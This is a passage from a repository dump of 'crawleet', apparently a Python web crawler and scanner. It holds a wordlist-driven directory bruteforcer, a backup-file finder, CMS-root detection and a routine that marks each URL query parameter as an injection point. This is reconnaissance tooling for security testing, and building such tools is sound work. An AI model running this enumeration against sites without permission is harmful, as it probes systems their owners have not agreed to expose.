126 | 			nodo = simplenode(path[0],parent=base)
127 | 			# test
128 | 			'''
129 | 			print "parent path -> ",base.getFPath()
130 | 			print "nodo actual -> ",path[0]
131 | 			'''
132 | 			#print "parent -> ",base
133 | 			#print "tipo parent -> ",type(base)
134 | 			# Agrego la parte parcial de la url del padre
135 | 			nodo.setFPath(base.getFPath())
136 | 			# fin test
137 | 		# Agrego los demas nodos
138 | 		if len(path) > 1:
139 | 			agrega(nodo,path[1:])
140 | 			
141 | #clean resource url
142 | def cleanrurl(rurl,rootnodeurl):
143 | 	# Tomamos despues del dominio
144 | 	newurl = rurl.replace(rootnodeurl,'')
145 | 	return newurl
146 | 
147 | '''
148 | 	Le paso los atributos
149 | 		dominio depth startpage bforce wlist cfgfile skipcerts 
150 | '''
151 | ''' 
152 | Debo dividir este metodo en dos.
153 | 	El primero regresa el sitemap en un nodo que debe recoger el crawler
154 | 		Buildsitemap debe 
155 | 	El segundo debe recibir ese nodo y una lista de recursos (objetos o no)
156 | 	mediante una bandera.
157 | 	Si starturl no tiene / al final se rompe 
158 | '''
159 | #def parseResources(rootnode,resources):
160 | #def parseResources(fname,rootnode,resources,rootisleaf):
161 | # chanfle: pasar los parametros de ejecucion para incluirlos en el xml
162 | # ver si puedo pasar los formularios, si es posible, pasar como 
163 | # parametro la lista de formularios y pasarlo directamente a sitexml
164 | # 
165 | def parseResources(fname,rootnode,resources,forms=None):
166 | 	#print('debug_root_node: %s ' % rootnode)
167 | 	try:
168 | 		rootisleaf=True
169 | 		if rootnode.endswith('/'):
170 | 			rootisleaf=False
171 | 		links  = []
172 | 		# Obtengo los links
173 | 		for r in resources: links.append(r.getUrl())
174 | 		#print('pase resources')
175 | 		# exp
176 | 		if rootisleaf: rootnode+='/'
177 | 		#print('pase rootisleaf')
178 | 		# Creacion de sitemap, se guarda en un nodo
179 | 		rnode = buildMap(rootnode,links)
180 | 		#print('pase rnode')
181 | 		smap = sitemap(rnode)
182 | 		#print('pase smap')
183 | 		mpobj = mapobj(smap[0],smap[1])
184 | 		#print('pase mpobj')
185 | 		# Termine de crear el sitemap
186 | 		# Una vez que tengo el sitemap itero sobre los recursos para inyectar info
187 | 		for res in resources:
188 | 			resurl = res.getUrl()
189 | 			#print('resurl %s ' % resurl)
190 | 			resurl = cleanrurl(resurl,rootnode)
191 | 			# Apartir del nodo raiz busco el nodo con la ruta resurl
192 | 			nactual = buscaRuta(rnode,resurl)
193 | 			# Pongo los atributos que tendra el nodo simple
194 | 			if nactual is not None:
195 | 				nactual.setForms(res.getForms())
196 | 				nactual.setStatus(res.getStatus())
197 | 		#########################################################
198 | 		# chanfle: aqui escribo el xml
199 | 		# regresarlo en el segundo elemento de la tupla
200 | 		sxml = siteXML(rnode,forms)
201 | 		#print('pase siteXML')
202 | 		mpobj.setXML(sxml)
203 | 		#print('pase mpobj set XML')
204 | 		return mpobj
205 | 	except Exception as e:
206 | 		print('error at site_mapper@parseResources')
207 | 		print(e)
208 | 		pass
209 | 		
210 | 	
211 | reload(sys)  
212 | sys.setdefaultencoding('utf8')
213 | 


--------------------------------------------------------------------------------
/sitemap/site_mapper.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/sitemap/site_mapper.pyc


--------------------------------------------------------------------------------
/utils/__init__.py:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/utils/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/utils/__init__.pyc


--------------------------------------------------------------------------------
/utils/bruteforcer.py:
--------------------------------------------------------------------------------
  1 | import parseurls
  2 | import time
  3 | import random
  4 | import string
  5 | class bruteforcer:
  6 | 	def __init__(self,reqobj,extensions,delay,verbose,wordlist=None):
  7 | 		self.bruteforced = []
  8 | 		self.req = reqobj
  9 | 		self.extensions = extensions 
 10 | 		self.delay = delay
 11 | 		if self.extensions == []: self.extensions = ['']
 12 | 		self.verbose = verbose
 13 | 		self.wordlist = wordlist
 14 | 		self.words = []
 15 | 		# global variable for found_resources
 16 | 		self.found_resources = []
 17 | 		try:
 18 | 			with open(self.wordlist) as f:
 19 | 				self.words = f.read().splitlines()
 20 | 		except:
 21 | 			print "Cant open bruteforce wordlist "
 22 | 			
 23 | 	"""
 24 | 	Funcion de bruteforce comun, toma el directorio e itera sobre la lista
 25 | 	"""
 26 | 	def directory(self,baseurl):
 27 | 		blinks = []
 28 | 		baseurl = self.getPreffix(baseurl)	# chanfle leer solo una vez y cargar en memoria
 29 | 		if baseurl not in self.bruteforced:
 30 | 			self.bruteforced.append(baseurl)
 31 | 			not_found_response = self.get_not_found_response(baseurl)
 32 | 			if not_found_response is not None:
 33 | 				if self.verbose: print '[bforcepath]: ',baseurl
 34 | 				if self.verbose: print '[bruteforcing with %s words]' % len(self.words)
 35 | 				for lrec in self.words:
 36 | 					for e in self.extensions:
 37 | 						res_name = "%s%s" % (lrec,e)
 38 | 						resource_url = baseurl+res_name if baseurl[-1] == '/' else baseurl+'/'+res_name
 39 | 						time.sleep(self.delay)
 40 | 						try:
 41 | 							resource_response = self.req.s.get(resource_url)
 42 | 							if self.verbose: print('[i] bruteforcing %s' % resource_url)
 43 | 							# si stat_code(1) == stat_code(2) => len(1) != len(2)
 44 | 							# si stat_code(1) != stat_code(2) 
 45 | 							if resource_response is not None and resource_response.text is not None:
 46 | 								if not_found_response.status_code != resource_response.status_code:
 47 | 									print('[+] Bruteforce resource found!: %s' % (resource_url))
 48 | 									blinks.append(resource_url)
 49 | 									self.found_resources.append(resource_url)
 50 | 								else:
 51 | 									# si son el mismo codigo de estatus hago una nueva peticion
 52 | 									# con un nombre random del mismo tamanio considerando extensiones
 53 | 									fixed_name = lrec
 54 | 									fixed_ext = e
 55 | 									orig_ext_idx = lrec.rfind('.')
 56 | 									if orig_ext_idx !=-1:
 57 | 										fixed_name = lrec[0:orig_ext_idx] 
 58 | 										fixed_ext = lrec[orig_ext_idx:]
 59 | 									try:
 60 | 										not_found_response = self.get_not_found_response(baseurl,len(fixed_name),fixed_ext)
 61 | 										"""
 62 | 										print('not_found response status_code %s' % not_found_response.status_code)
 63 | 										print('not_found_response length: %s' % len(not_found_response.text))
 64 | 										print('resource_response status_code %s' % resource_response.status_code)
 65 | 										print('resource response length: %s' % len(resource_response.text))
 66 | 										"""
 67 | 										if len(not_found_response.text) != len(resource_response.text):
 68 | 											print('[+] Bruteforce resource found!: %s' % (resource_url))
 69 | 											blinks.append(resource_url)
 70 | 											self.found_resources.append(resource_url)
 71 | 									except Exception as e:
 72 | 										print(e)
 73 | 						except Exception as e:
 74 | 							print(e)
 75 | 							exit()
 76 | 			return blinks
 77 | 		else:
 78 | 			if self.verbose: print 'Bruteforcer@directory %s Skipping directory (already bruteforced)' % baseurl
 79 | 		return blinks
 80 | 	
 81 | 	def get_not_found_response(self,dir_url,name_length=32,ext=''):
 82 | 		random_str = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(name_length)])
 83 | 		random_url = '%s%s%s' % (dir_url,random_str,ext)
 84 | 		#print('Generated random_url %s' % random_url)
 85 | 		try:
 86 | 			r = self.req.s.get(random_url)
 87 | 			if r is not None and r.text is not None:
 88 | 				return r
 89 | 			return None
 90 | 		except Exception as e:
 91 | 			print('[i] problem with %s' % random_url)
 92 | 			print(e)
 93 | 			return None
 94 | 		
 95 | 	# Regresa el prefijo del recurso ie url de url/recurso
 96 | 	def getPreffix(self,baseurl):
 97 | 		# El problema ocurre aqui debo ver si el preffix es de un recurso
 98 | 		return baseurl.rsplit('/',1)[0]+'/'
 99 | 	
100 | 	"""
101 | 	Utilizado para encontrar respaldos del recurso pasado como parametro
102 | 	"""
103 | 	def thisFile(self,baseurl):
104 | 		blinks = []
105 | 		resname = parseurls.getRecFinal(baseurl)
106 | 		baseurl = self.getPreffix(baseurl)	# chanfle leer solo una vez y cargar en memoria
107 | 		filebackups = parseurls.getBackupNames(resname)
108 | 
109 | 		not_found_response = self.get_not_found_response(baseurl)
110 | 		if not_found_response is not None and not_found_response.text is not None:
111 | 			for fbak in filebackups:
112 | 				backup_url = baseurl+fbak if baseurl[-1] == '/' else baseurl+'/'+fbak
113 | 				try:
114 | 					response_backup_url = self.req.s.get(backup_url)
115 | 					if response_backup_url is not None and response_backup_url.text is not None:
116 | 						if len(not_found_response.text) != len(response_backup_url.text):
117 | 							blinks.append(response_backup_url)
118 | 				except Exception as e:
119 | 					print(e)
120 | 
121 | 			"""
122 | 			stat = self.req.getHeadRequest(res).status_code
123 | 			if stat is not None and stat < 300:
124 | 				print "[+] Resource found: %s",res
125 | 				blinks.append(res)
126 | 			"""
127 | 		return blinks
128 | 		
129 | 	def __str__(self):
130 | 		s = "*"*30+"\n"+"Bruteforcer"+"\n"
131 | 		print s
132 | 		print self.req
133 | 		print self.wordlist
134 | 		return ""
135 | 


--------------------------------------------------------------------------------
/utils/bruteforcer.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/utils/bruteforcer.pyc


--------------------------------------------------------------------------------
/utils/parseurls.py:
--------------------------------------------------------------------------------
  1 | #import html
  2 | import re
  3 | #import urllib
  4 | from urlparse import urljoin
  5 | 
  6 | def get_extension(the_url):
  7 | 	last_idx = the_url.rfind('.')
  8 | 	if last_idx !=-1:
  9 | 		ext = the_url[last_idx:]
 10 | 		try:
 11 | 			m = re.search("(\.[A-Za-z0-9]+)",the_url[last_idx:])
 12 | 			return m.group()
 13 | 		except Exception as e:
 14 | 			return ""
 15 | 	else:
 16 | 		return ""
 17 | 		
 18 | def getList(file_name):
 19 | 	try:
 20 | 		#print('parseurl.getList with %s' % file_name)
 21 | 		#print(type(file_name))
 22 | 		with open(file_name) as f:
 23 | 			return f.read().splitlines()
 24 | 	except Exception as e:
 25 | 		print('error parseurl@getList')
 26 | 		print(e)
 27 | 		return []		
 28 | 		
 29 | #Funcion que regresa http[s]://dominio de una url sin la diagonal al final
 30 | def getDomain(url):
 31 | 	proto = "".join(url.split('//')[0])+'//'
 32 | 	domain = "".join(url.split('//')[1]).split('/')[0]
 33 | 	return proto+domain
 34 | 
 35 | # regresa solo el dominio sin protocolo
 36 | def domainOnly(url):
 37 | 	proto = "".join(url.split('//')[0])+'//'
 38 | 	domain = "".join(url.split('//')[1]).split('/')[0]
 39 | 	return domain
 40 | 	
 41 | # Obtiene todos los directorios basados en los recursos encontrados
 42 | def getDirectories(urls):
 43 | 	dirs = []
 44 | 	domain = ''
 45 | 	if len(urls)>0:
 46 | 		domain = getDomain(urls[0])
 47 | 	for url in urls:
 48 | 		#print url
 49 | 		try:
 50 | 			if getDomain(url).startswith(domain):
 51 | 				actdir = quitaRecFinal(url)
 52 | 				if actdir not in dirs and actdir.startswith(domain):
 53 | 					dirs.append(actdir)
 54 | 		except Exception as e:
 55 | 			print "Error@getDirectories url %s e %s " % (url,e)
 56 | 	#print dirs
 57 | 	#print "sali de getdirectories"
 58 | 	return dirs
 59 | 
 60 | # Funcion que regresa dirs distintos a los default en el cms
 61 | # paso el dominio, la lista de directorios a analizar y los dirs default
 62 | def uncommonDirectories(dirs,defdirs):
 63 | 	uncommondirs = []
 64 | 	domain = ''
 65 | 	if len(dirs)>0:
 66 | 		domain = getDomain(dirs[0])
 67 | 	for dir in dirs:
 68 | 		toadd = True
 69 | 		for defd in defdirs:
 70 | 			if dir.startswith(domain+defd):
 71 | 				toadd = False
 72 | 		if toadd:
 73 | 			uncommondirs.append(dir)
 74 | 	return uncommondirs
 75 | 	
 76 | # recurl:- url del padre ie pagina que llama al formulario
 77 | # actionurl ruta del formulario (puede ser relativa).
 78 | def normalize(recurl,actionurl):
 79 | 	try:
 80 | 		if esAbsoluta(actionurl):
 81 | 			return actionurl
 82 | 		return urljoin(recurl,actionurl)
 83 | 	except Exception as e:
 84 | 		print 'error@normalize with recurl %s acurl %s ' % (recurl,actionurl)
 85 | 		return None
 86 | 	"""
 87 | 	try:
 88 | 		recurl = quitaRecFinal(recurl)
 89 | 		if esAbsoluta(actionurl):	# CASO A
 90 | 			print 'Debug @normalize %s es absoluta ' % actionurl
 91 | 			return actionurl
 92 | 		# No es absoluta caso B
 93 | 		print 'Debug @normalize %s no es absoluta ' % actionurl
 94 | 		pts = cuentaSubcadenas(actionurl,'..')
 95 | 		if pts == 0:	# Caso B.1
 96 | 			#print 'Caso B.1'
 97 | 			if cuentaSubcadenas(actionurl,'/') > 0: # B.1.1
 98 | 				if actionurl.startswith('/'):	# B.1.1.1
 99 | 					#return recurl+actionurl[1:]
100 | 					print 'Caso B.1.1'
101 | 					return getDomain(recurl)+actionurl
102 | 				else:						# B.1.1.2
103 | 					print 'Caso B.1.1.2'
104 | 					return recurl+actionurl
105 | 			else:
106 | 				print 'Caso B.1.2'
107 | 				return recurl+actionurl		#B.1.2
108 | 		else:
109 | 			print 'Caso B.2'
110 | 			recurl = quitaDiagonales(recurl,pts)	# B.2
111 | 			return recurl+getRecFinal(actionurl)
112 | 	except Exception as e:
113 | 		print "Error @normalize\n%s recurl %s actionurl %s "%(e,recurl,actionurl)
114 | 	"""
115 | def removeExtraSlashes(acturl):
116 | 	slashlist = acturl.split('//')
117 | 	endslash = ''
118 | 	try:
119 | 		proto = ''.join(slashlist[0])+ '//'
120 | 		path = acturl[len(proto):]
121 | 		pattern = '/{2,}'
122 | 		p = re.sub(pattern,'/',path)
123 | 		return proto+p+endslash
124 | 	except Exception as e:
125 | 		print "error@removeSlashes"
126 | 		return acturl
127 | 		
128 | # True si la url es absoluta
129 | def esAbsoluta(recurl):
130 | 	linkpattern = '([A-Za-z0-9])+://'
131 | 	if re.match(linkpattern,recurl) is not None:
132 | 		return True
133 | 	return False
134 | 	
135 | # recurl:= http[s]://domain/dir1/dir2/dirn/rec
136 | # regresa http[s]://domain/dir1/dir2/dirn/
137 | def quitaRecFinal(cad):
138 | 	lcad = len(cad)
139 | 	for i in reversed(range(lcad)):
140 | 		if cad[i] == '/':
141 | 			return cad[:i+1]
142 | 
143 | # Sea url:= http://dom/dir1/dir2/recfinal
144 | # regresa recfinal
145 | def getRecFinal(cad):
146 | 	#print 'entre a recfinal con cad -> ',cad
147 | 	lcad = len(cad)
148 | 	for i in reversed(range(lcad)):
149 | 		if cad[i] == '/':
150 | 			return cad[i+1:]
151 | 			
152 | # quita una diagonal y todas las letras hasta encontrar otra diagonal
153 | # de derecha a izq. ie si urL:= ://path1/path2/path3/
154 | # el resultado de aplicar este metodo es ://path1/path2/
155 | def quitaDiagonal(cad):
156 | 	lcad = len(cad)
157 | 	encontrada = False
158 | 	for i in reversed(range(lcad)):
159 | 		# encontre la diagonal limite izq
160 | 		if cad[i] == '/':
161 | 			if encontrada == True:
162 | 				#print cad[:i+1]
163 | 				return cad[:i+1]
164 | 			else:
165 | 				encontrada = True
166 | 			
167 | # quita n diagonales (incluyendo lo que haya en medio de 2 diagonales )
168 | # de der a izq y regresa el resultado
169 | def quitaDiagonales(recurl,num):
170 | 	#print "Quitando %s diagonales de %s " % (num,recurl)
171 | 	recurlx = recurl
172 | 	for i in range(0,num):
173 | 		recurlx = quitaDiagonal(recurlx)
174 | 	#print "Result %s "%recurlx
175 | 	return recurlx
176 | 
177 | # Regresa el numero de repiticiones de una subcadena en la cadena principal
178 | def cuentaSubcadenas(recurl,subcad):
179 | 	return recurl.count(subcad)
180 | 
181 | # Genera posibles nombres para archivos de respaldo del recurso pasado como parametro
182 | def getBackupNames(resname):
183 | 	#print "entre a backupnames [%s] " % resname
184 | 	if len(resname) > 0:
185 | 		exts = [
186 | 			"~%s" % resname,
187 | 			"%s~" % resname,
188 | 			"%s.back" % resname,
189 | 			"%s.bkp" % resname,
190 | 			"%s.backup" % resname,
191 | 			"%s.tmp" % resname,
192 | 			"%s.res" % resname
193 | 		]
194 | 		return exts
195 | 	return []
196 | 	
197 | '''
198 | 	Dirs es un diccionario donde la llave es la carpeta y el valor es el
199 | 	nivel de profundidad en el cms de dicha carpeta
200 | 	Por ejemplo si el cms es wordpress y la carpeta wp-admin
201 | 	en dirs tenemos:
202 | 		dirs['wp-admin'] = 1
203 | 	Entonces si en los directorios se encuentra wp-admin la raiz esta
204 | 	un nivel mas arriba por lo que a la ruta donde se encontro wp-admin
205 | 	debe quitarsele un nivel mas
206 | '''
207 | def getCMSRoot(reslist,defdirs):
208 | 	founddirs = getDirectories(reslist)
209 | 	print('[i] getCMSRoot:')
210 | 	print('Resource list:')
211 | 	print(' '.join(reslist))
212 | 	#print('Default dirs:')
213 | 	tmp = [ '%s:%s' % (dkey,defdirs[dkey]) for dkey in defdirs.keys()]
214 | 	print(' '.join(tmp))
215 | 	print('found dirs: ')
216 | 	print('\n'.join(founddirs))
217 | 	for ddir in founddirs:
218 | 		for defdir in defdirs.keys():
219 | 			if defdir in ddir:
220 | 				try:
221 | 					#print 'found %s in %s level %s' % (defdir,ddir,defdirs[defdir])
222 | 					return getCMSRootX(ddir,defdir,defdirs[defdir])
223 | 				except Exception as e:
224 | 					return getCMSRootX(ddir,defdir,1)
225 | 				'''
226 | 				print 'found %s in %s level %s' % (defdir,ddir,defdirs[defdir])
227 | 				return getCMSRootX(ddir,defdir,defdirs[defdir])
228 | 				'''
229 | # Metodo interno para CMSRoot quita level-1 diagonales de la url detectada
230 | def getCMSRootX(baseurl,defdir,level):
231 | 	try:
232 | 		#print 'resultado de quitadiag ',quitaDiagonales(baseurl.split(defdir)[0],level-1)
233 | 		return quitaDiagonales(baseurl.split(defdir)[0],level-1)
234 | 	except Exception as e:
235 | 		print "Error @getCMSRoot: ",e
236 | 		return None
237 | 		
238 | #[(url_resource,url?var_to_inject=placeholder&var2=val...&varn=valn)...(url_res,url_to_inject,var_name)]
239 | def get_injection_points(url):
240 | 	new_url = re.sub('&+','&',url)
241 | 	# now we split with the token ?
242 | 	list_split_base_url = new_url.split('?')
243 | 	# el primer elemento del split es la base de la url
244 | 	# el elemento de la derecha son los parametros
245 | 	if len(list_split_base_url) < 2:
246 | 		return None
247 | 	else:
248 | 		# base_url = url_resource = http://dom/resource
249 | 		base_url = "%s?" % list_split_base_url[0]
250 | 		# url_vars_string = var1=val1&var2=val2&...&varn=valn
251 | 		url_vars_string = ''.join(list_split_base_url[1:])
252 | 		# [var1 = val1, var2=val2, ..., varn=valn]
253 | 		var_list = url_vars_string.split('&')
254 | 		#print('base_url: %s' % base_url)
255 | 		#print('url_vars: %s' % url_vars_string)
256 | 		injection_points = []
257 | 		for i in range(0,len(var_list)):
258 | 			var_info = var_list[i]
259 | 			var_name = var_info.split('=')[0]
260 | 			var_fixed = '%s={TO_REPLACE}' % var_name
261 | 			url_to_inject = '%s%s' % (base_url,'&'.join(var_list[0:i]+[var_fixed]+var_list[i+1:]))
262 | 			#injection_points.append(fixed_url)
263 | 			#url_resource,url?var_to_inject=placeholder&var2=val...&varn=valn
264 | 			injection_data = (base_url,url_to_inject,var_name)
265 | 			#print('injection_data')
266 | 			#print(injection_data)
267 | 			injection_points.append(injection_data)
268 | 		#print('injection_points: for %s ' % base_url)
269 | 		#print(injection_points)
270 | 		#print('\n'.join(injection_points))
271 | 		return injection_points
272 | 


--------------------------------------------------------------------------------
/utils/parseurls.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/utils/parseurls.pyc


--------------------------------------------------------------------------------
/utils/ubanner.py:
--------------------------------------------------------------------------------
  1 | import base64
  2 | from random import randint
  3 | 
  4 | imgbn = [
  5 | """
  6 | ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgIGBgICAgICAgICAg
  7 | ICAgICAgICAgICAgICAKICAgICBgOiAgICAuLy8tLiAgIC06LWAgICAgICAgICAgICAKICAgYCAg
  8 | LXNgICAgYG9kby1gICAueSsuICAgICAgICAgICAKICAgLyAgIG9kK2AgICAuZG15Ky4gIG9tby0g
  9 | ICAgICAgICAKICAgKzogIGBoTnkuICAgLXNNTnMtYGAvTmQrLiAgICAgICAKICAgLmQvYCAuaE1k
 10 | Ly1gIC55TU1tL2BgLXlNaC4gICAgICAKICAgYG9OKyAgLU5NaDouIC4tTk1NeS4gYC1tTW06YCAg
 11 | ICAKICAgIC1NTi4gYC9tTW0rLiAub2hOTnMuIGAuc01OL2AgICAKICAgIC1kTW9gIGB5Tk1tOmAg
 12 | IGAtaE0rLiAgYHNOaC4gICAKICAgIGAuZE0vICBgLWRNaC1gICAgLU5tLy4gICA6ZCsgICAKICAg
 13 | ICAtbU1kOmAgIDptTitgICAgIC1zeWAgICAgYDogICAKICAgICAgK2RNc2AgICAuc3NgICAgICAg
 14 | Ly4gICAgICBgICAKICAgICAgIC5tTjogICAgLm8tICAgICAgIGAgICAgICAgICAKICAgICAgICAu
 15 | K3MgICAgICAtYCAgICAgICAgICAgICAgICAKICAgICAgICAgIC46ICAgICAgICAgICAgICAgICAg
 16 | ICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAK
 17 | """,
 18 | """
 19 | ICAgICAgICAgYCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICBg
 20 | YCAgICBgYCAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICBgYCAgIGBgICAg
 21 | ICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAuYCAgIGAgICBgKyBgICAgIGBgYCAgICAg
 22 | ICAgICAgICAgICAgCiAgICAgICAgIGBgYCBgYGBgIC5gYGBgICAgYGBgYCAgICAgICAgICAgICAg
 23 | IAogICAgICAgICBgYGBgICBgYGAgICAgYGAgICBgYGBgYCAgICAgICAgICAgICAKICAgICAgICAg
 24 | ICBgYGAgIGAgYGAgICAgYGAuICBgYCAuYCAgICAgICAgICAgCiAgICAgICAgICAgYGAuYCAgLmBg
 25 | YCAgIGBgOmAgIGBgIGBgYGAgICAgICAgIAogICAgICAgICAgICAgYGBgICBgYGAgICAgLitgLiAg
 26 | YGAvc2grYCAgICAgICAKICAgICAgICAgICAgYGAgYC4gIGBgYGAgICAvYGAuLy46LXloTnlgICAg
 27 | ICAgCiAgICAgICAgICAgIGAgYC0uICBgYCBgYCAgYGBgLStzb2AuOnlOKyAgICAgIAogICAgICAg
 28 | ICAgIGBgYDpvc2BgYGAteWQ6YCAuL2hOTnMgIGAtc2ggICAgICAKICAgICAgICAgICAgIGAuK2hg
 29 | ICBgLXNoZC46c3lzZE5OLSAgLm8rICAgICAgCiAgICAgICAgICAgICBgLisvICAgIGAuOm0tIGAu
 30 | Li9vTm8gIGArYCAgICAgIAogICAgICAgICAgICAgYC4uICAgICAgYGBkLiAgIGBgK20vICBgICAg
 31 | ICAgICAKICAgICAgICAgICAgICAgICAgICAgICAvbyAgICAgYCtoYCAgICAgICAgICAgCiAgICAg
 32 | ICAgICAgICAgICAgICAgICBgLiAgICAgIGBzLiAgICAgICAgICAgIAogICAgICAgICAgICAgICAg
 33 | ICAgICAgICAgICAgICAuICAgICAgICAgICAgICAK
 34 | """
 35 | ]
 36 | txtbn = [
 37 | """
 38 | CgogICAgICBfICAgICAgICAgICAgICAgIF8gICAgICAgICAgIAogIF9fX3wgfCBfXyBfX18gICAg
 39 | ICBffCB8IF9fXyBfIF9fIAogLyBfX3wgfC8gX2AgXCBcIC9cIC8gLyB8LyBfIFwgJ19ffAp8IChf
 40 | X3wgfCAoX3wgfFwgViAgViAvfCB8ICBfXy8gfCAgIAogXF9fX3xffFxfXyxffCBcXy9cXy8gfF98
 41 | XF9fX3xffCAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAoK
 42 | """,
 43 | """
 44 | ICAgICAgICAgICQkXCAgICAgICAgICAgICAgICAgICAgICAgICAkJFwgICAgICAgICAgICAgICAg
 45 | ICAgICAKICAgICAgICAgICQkIHwgICAgICAgICAgICAgICAgICAgICAgICAkJCB8ICAgICAgICAg
 46 | ICAgICAgICAgICAKICQkJCQkJCRcICQkIHwgJCQkJCQkXCAgJCRcICAkJFwgICQkXCAkJCB8ICQk
 47 | JCQkJFwgICAkJCQkJCRcICAKJCQgIF9fX19ffCQkIHwgXF9fX18kJFwgJCQgfCAkJCB8ICQkIHwk
 48 | JCB8JCQgIF9fJCRcICQkICBfXyQkXCAKJCQgLyAgICAgICQkIHwgJCQkJCQkJCB8JCQgfCAkJCB8
 49 | ICQkIHwkJCB8JCQkJCQkJCQgfCQkIHwgIFxfX3wKJCQgfCAgICAgICQkIHwkJCAgX18kJCB8JCQg
 50 | fCAkJCB8ICQkIHwkJCB8JCQgICBfX19ffCQkIHwgICAgICAKXCQkJCQkJCRcICQkIHxcJCQkJCQk
 51 | JCB8XCQkJCQkXCQkJCQgIHwkJCB8XCQkJCQkJCRcICQkIHwgICAgICAKIFxfX19fX19ffFxfX3wg
 52 | XF9fX19fX198IFxfX19fX1xfX19fLyBcX198IFxfX19fX19ffFxfX3wgICAgICAKICAgICAgICAg
 53 | ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAK
 54 | """,
 55 | """
 56 | ICAgICAgIAogICAgICAgCiAgICAgICAuX18gICAgICAgICAgICAgICAgLl9fICAgICAgICAgICAg
 57 | ICAgIAogIF9fX18gfCAgfCBfX19fXyBfXyAgXyAgX3wgIHwgICBfX19fX19fX19fXyAKXy8gX19f
 58 | XHwgIHwgXF9fICBcXCBcLyBcLyAvICB8IF8vIF9fIFxfICBfXyBcClwgIFxfX198ICB8X18vIF9f
 59 | IFxcICAgICAvfCAgfF9cICBfX18vfCAgfCBcLwogXF9fXyAgPl9fX18oX19fXyAgL1wvXF8vIHxf
 60 | X19fL1xfX18gID5fX3wgICAKICAgICBcLyAgICAgICAgICBcLyAgICAgICAgICAgICAgICAgXC8g
 61 | ICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAg
 62 | ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAK
 63 | """,
 64 | """
 65 | ICAgICAgICBfXyAgICAgICAgICAgICAgIF9fICAgICAgICAgCiAgICAgICAgX18gICAgICAgICAg
 66 | ICAgICBfXyAgICAgICAgIAogICAgICAgIF9fICAgICAgICAgICAgICAgX18gICAgICAgICAKICAg
 67 | ICAgICBfXyAgICAgICAgICAgICAgIF9fICAgICAgICAgCiAgX19fX18vIC9fX18gX18gICAgICBf
 68 | Xy8gL19fICBfX19fXwogLyBfX18vIC8gX18gYC8gfCAvfCAvIC8gLyBfIFwvIF9fXy8KLyAvX18v
 69 | IC8gL18vIC98IHwvIHwvIC8gLyAgX18vIC8gICAgClxfX18vXy9cX18sXy8gfF9fL3xfXy9fL1xf
 70 | X18vXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAoKICAgICAgICBf
 71 | XyAgICAgICAgICAgICAgIF9fICAgICAgICAgCg==
 72 | """,
 73 | """
 74 | ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAg
 75 | ICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
 76 | ICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAg
 77 | ICAgICAgICAgICAgICAgICAgICAgICAgICAgIAog4paE4paEwrcg4paE4paE4paMICAg4paE4paE
 78 | 4paEwrcg4paE4paE4paMIOKWkCDiloTiloziloTiloTilowgIOKWhOKWhOKWhCAu4paE4paE4paE
 79 | ICAK4paQ4paIIOKWjOKWquKWiOKWiOKAoiAg4paQ4paIIOKWgOKWiCDilojilojCtyDilojilozi
 80 | lpDilojilojilojigKIgIOKWgOKWhC7iloDCt+KWgOKWhCDilojCtwrilojilogg4paE4paE4paI
 81 | 4paI4paqICDiloTilojiloDiloDilogg4paI4paI4paq4paQ4paI4paQ4paQ4paM4paI4paI4paq
 82 | ICDilpDiloDiloDilqriloTilpDiloDiloDiloQgCuKWkOKWiOKWiOKWiOKWjOKWkOKWiOKWjOKW
 83 | kOKWjOKWkOKWiCDilqrilpDilozilpDilojilozilojilojilpDilojilozilpDilojilozilpDi
 84 | lozilpDilojiloTiloTilozilpDilojigKLilojilowKwrfiloDiloDiloAgLuKWgOKWgOKWgCAg
 85 | 4paAICDiloAgIOKWgOKWgOKWgOKWgCDiloDilqou4paA4paA4paAICDiloDiloDiloAgLuKWgCAg
 86 | 4paACiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAg
 87 | ICAgICAgICAgICAgICAgICAgICAgICAgICAK
 88 | """
 89 | ]
 90 | 
 91 | def getBanner():
 92 | 	r = randint(0,len(imgbn)-1)
 93 | 	r2 = randint(0,len(txtbn)-1)
 94 | 	actimgbn = base64.b64decode(imgbn[r]).splitlines()
 95 | 	acttxtbn = base64.b64decode(txtbn[r2]).splitlines()
 96 | 	limgbn = len(actimgbn)
 97 | 	ltxtbn = len(acttxtbn)
 98 | 	bn = ''
 99 | 	lim = limgbn
100 | 	for i in range(0,limgbn):
101 | 		bn+= '\n'+actimgbn[i]
102 | 		if i<ltxtbn: bn+=acttxtbn[i]
103 | 		if i==ltxtbn: bn+="\t\tby truerandom"
104 | 	return bn
105 | 
106 | 


--------------------------------------------------------------------------------
/utils/ubanner.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/utils/ubanner.pyc


